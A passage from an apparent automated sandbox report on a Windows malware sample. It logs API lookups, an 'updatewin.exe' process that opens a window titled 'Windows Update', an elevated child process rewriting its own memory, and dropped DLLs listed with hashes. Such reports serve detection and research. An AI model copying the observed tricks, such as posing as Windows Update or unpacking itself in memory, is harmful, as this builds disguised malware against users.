Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteConsoleW, address_out = 0x76c57aca True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x76c310ff True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x76c31700 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x76c311c0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x76c334d5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x76c354ee True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x76c31809 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x76c4d802 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSListHead, address_out = 0x771694a4 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x76c311a9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x771522b0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77152270 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x76c349ad True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x76c311e0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x76c314fb True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x76c33587 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x76c334c8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x76c31222 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x76c3495d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RaiseException, address_out = 0x76c358a6 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStdHandle, address_out = 0x76c351b3 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x76c31282 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x76c37a10 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x76c3179c True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7715e026 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x76c314c9 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x76c34442 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileExW, address_out = 0x76c41811 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DecodePointer, address_out = 0x77169d35 True 1
Module Load module_name = USER32.dll, base_address = 0x74f40000 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x74f60a19 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = InvalidateRect, address_out = 0x74f61381 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x74f7e061 True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x74f68deb True 1
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x74f60eb6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDlgItem, address_out = 0x74f7f1ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74f61341 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DialogBoxParamW, address_out = 0x74f7cfca True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MoveWindow, address_out = 0x74f63698 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetClientRect, address_out = 0x74f60c62 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateDialogParamW, address_out = 0x74f810dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowPos, address_out = 0x74f58e4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateAcceleratorW, address_out = 0x74f61246 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadAcceleratorsW, address_out = 0x74f64dd6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadStringW, address_out = 0x74f58eb9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x74f5b142 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoW, address_out = 0x74f63000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x74f63150 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x75aed41c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkMode, address_out = 0x75ae51a2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x75aeb600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateSolidBrush, address_out = 0x75ae4f17 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextAlign, address_out = 0x75ae8401 True 1
Fn
Module Load module_name = COMCTL32.dll, base_address = 0x74820000 True 1
Fn
Module Get Address module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll, function = InitCommonControlsEx, address_out = 0x748409ce True 1
Fn
Module Load module_name = WINMM.dll, base_address = 0x74af0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\winmm.dll, function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x749c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x749dc544 True 1
Fn
System Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Fn
System Get Time type = Performance Ctr, time = 18359128587 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Module Load module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x0 False 1
Fn
Module Load module_name = kernel32, base_address = 0x76c20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Module Load module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Module Load module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 260 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Window Create window_name = Windows Update, class_name = WINDOWSUPDATE, wndproc_parameter = 0 True 1
Fn
Thread 0xa70
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 10 Fn
Process #12: 5.exe
Information Value
ID #12
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:02, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:14
OS Process Information
Information Value
PID 0xa38
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xA3C, 0xA78, 0xA7C, 0xA80, 0xA84, 0xA88, 0xA8C, 0xA90, 0xACC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
5.exe 0x00400000 0x0047FFFF Marked Writable - 32-bit - False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00405B40, 0x0040273D False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040372A, 0x00404440 False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00409000, 0x00408FEA, ... False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040D36D, 0x0040B64F False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00401A8A, 0x0040AF97, ... False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00422DC0, 0x00424B80 False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00423300 False
buffer 0x00549D18 0x00559C80 Marked Executable - 32-bit - False
buffer 0x00549D18 0x00559C80 Content Changed - 32-bit 0x0054A643, 0x00549D18 False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0041A684 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040C3C4 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00414020 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00412564 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004108F8 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00415290 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004176D0 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00418CEC True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00419108 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040F944 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004132E0 True
Dropped Files
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll 18.30 KB MD5: 502263c56f931df8440d7fd2fa7b7c00
SHA1: 523a3d7c3f4491e67fc710575d8e23314db2c1a2
SHA256: 94a5df1227818edbfd0d5091c6a48f86b4117c38550343f780c604eee1cd6231
SSDeep: 192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll 17.80 KB MD5: 88ff191fd8648099592ed28ee6c442a5
SHA1: 6a4f818b53606a5602c609ec343974c2103bc9cc
SHA256: c310cc91464c9431ab0902a561af947fa5c973925ff70482d3de017ed3f73b7d
SSDeep: 384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll 17.80 KB MD5: e2f648ae40d234a3892e1455b4dbbe05
SHA1: d9d750e828b629cfb7b402a3442947545d8d781b
SHA256: c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03
SSDeep: 192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll 17.80 KB MD5: e479444bdd4ae4577fd32314a68f5d28
SHA1: 77edf9509a252e886d4da388bf9c9294d95498eb
SHA256: c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719
SSDeep: 192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll 18.30 KB MD5: d0873e21721d04e20b6ffb038accf2f1
SHA1: 9e39e505d80d67b347b19a349a1532746c1f7f88
SHA256: bb25ccf8694d1fcfce85a7159dcf6985fdb54728d29b021cb3d14242f65909ce
SSDeep: 384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll 20.30 KB MD5: eff11130bfe0d9c90c0026bf2fb219ae
SHA1: cf4c89a6e46090d3d8feeb9eb697aea8a26e4088
SHA256: 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97
SSDeep: 384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll 19.80 KB MD5: 71af7ed2a72267aaad8564524903cff6
SHA1: 8a8437123de5a22ab843adc24a01ac06f48db0d3
SHA256: 5dd4ccd63e6ed07ca3987ab5634ca4207d69c47c2544dfefc41935617652820f
SSDeep: 384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll 18.30 KB MD5: 0d1aa99ed8069ba73cfd74b0fddc7b3a
SHA1: ba1f5384072df8af5743f81fd02c98773b5ed147
SHA256: 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1
SSDeep: 384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll 17.80 KB MD5: 0f079489abd2b16751ceb7447512a70d
SHA1: 679dd712ed1c46fbd9bc8615598da585d94d5d87
SHA256: f7d450a0f59151bcefb98d20fcae35f76029df57138002db5651d1b6a33adc86
SSDeep: 192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll 18.30 KB MD5: ac290dad7cb4ca2d93516580452eda1c
SHA1: fa949453557d0049d723f9615e4f390010520eda
SHA256: c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SSDeep: 192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll 19.80 KB MD5: aec2268601470050e62cb8066dd41a59
SHA1: 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256: 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SSDeep: 384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll 18.80 KB MD5: 93d3da06bf894f4fa21007bee06b5e7d
SHA1: 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256: f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SSDeep: 192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll 25.80 KB MD5: 35fc66bd813d0f126883e695664e7b83
SHA1: 2fd63c18cc5dc4defc7ea82f421050e668f68548
SHA256: 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735
SSDeep: 384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/msvcp140.dll 429.80 KB MD5: 109f0f02fd37c84bfc7508d4227d7ed5
SHA1: ef7420141bb15ac334d3964082361a460bfdb975
SHA256: 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SSDeep: 12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-1-0.dll 21.30 KB MD5: 94ae25c7a5497ca0be6882a00644ca64
SHA1: f7ac28bbc47e46485025a51eeb6c304b70cee215
SHA256: 7ea06b7050f9ea2bcc12af34374bdf1173646d4e5ebf66ad690b37f4df5f3d4e
SSDeep: 384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/freebl3.dll 324.95 KB MD5: 343aa83574577727aabe537dccfdeafc
SHA1: 9ce3b9a182429c0dba9821e2e72d3ab46f5d0a06
SHA256: 393ae7f06fe6cd19ea6d57a93dd0acd839ee39ba386cf1ca774c4c59a3bfebd8
SSDeep: 6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll 17.80 KB MD5: cb978304b79ef53962408c611dfb20f5
SHA1: eca42f7754fb0017e86d50d507674981f80bc0b9
SHA256: 90fae0e7c3644a6754833c42b0ac39b6f23859f9a7cf4b6c8624820f59b9dad3
SSDeep: 192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll 17.80 KB MD5: 6d778e83f74a4c7fe4c077dc279f6867
SHA1: f5d9cf848f79a57f690da9841c209b4837c2e6c3
SHA256: a97dcca76cdb12e985dff71040815f28508c655ab2b073512e386dd63f4da325
SSDeep: 192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll 17.80 KB MD5: 6db54065b33861967b491dd1c8fd8595
SHA1: ed0938bbc0e2a863859aad64606b8fc4c69b810a
SHA256: 945cc64ee04b1964c1f9fcdc3124dd83973d332f5cfb696cdf128ca5c4cbd0e5
SSDeep: 384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll 17.80 KB MD5: 2ea3901d7b50bf6071ec8732371b821c
SHA1: e7be926f0f7d842271f7edc7a4989544f4477da7
SHA256: 44f6df4280c8ecc9c6e609b1a4bfee041332d337d84679cfe0d6678ce8f2998a
SSDeep: 192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll 17.44 KB MD5: d97a1cb141c6806f0101a5ed2673a63d
SHA1: d31a84c1499a9128a8f0efea4230fcfa6c9579be
SHA256: deccd75fc3fc2bb31338b6fe26deffbd7914c6cd6a907e76fd4931b7d141718c
SSDeep: 192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll 18.30 KB MD5: d500d9e24f33933956df0e26f087fd91
SHA1: 6c537678ab6cfd6f3ea0dc0f5abefd1c4924f0c0
SHA256: bb33a9e906a5863043753c44f6f8165afe4d5edb7e55efa4c7e6e1ed90778eca
SSDeep: 384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll 17.80 KB MD5: 6f6796d1278670cce6e2d85199623e27
SHA1: 8aa2155c3d3d5aa23f56cd0bc507255fc953ccc3
SHA256: c4f60f911068ab6d7f578d449ba7b5b9969f08fc683fd0ce8e2705bbf061f507
SSDeep: 192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll 18.80 KB MD5: 5f73a814936c8e7e4a2dfd68876143c8
SHA1: d960016c4f553e461afb5b06b039a15d2e76135e
SHA256: 96898930ffb338da45497be019ae1adcd63c5851141169d3023e53ce4c7a483e
SSDeep: 192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll 18.94 KB MD5: a2d7d7711f9c0e3e065b2929ff342666
SHA1: a17b1f36e73b82ef9bfb831058f187535a550eb8
SHA256: 9dab884071b1f7d7a167f9bec94ba2bee875e3365603fa29b31de286c6a97a1d
SSDeep: 384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll 18.30 KB MD5: d0289835d97d103bad0dd7b9637538a1
SHA1: 8ceebe1e9abb0044808122557de8aab28ad14575
SHA256: 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a
SSDeep: 384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll 17.30 KB MD5: fee0926aa1bf00f2bec9da5db7b2de56
SHA1: f5a4eb3d8ac8fb68af716857629a43cd6be63473
SHA256: 8eb5270fa99069709c846db38be743a1a80a42aa1a88776131f79e1d07cc411c
SSDeep: 192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
False
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll 17.30 KB MD5: fdba0db0a1652d86cd471eaa509e56ea
SHA1: 3197cb45787d47bac80223e3e98851e48a122efa
SHA256: 2257fea1e71f7058439b3727ed68ef048bd91dcacd64762eb5c64a9d49df0b57
SSDeep: 384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
False
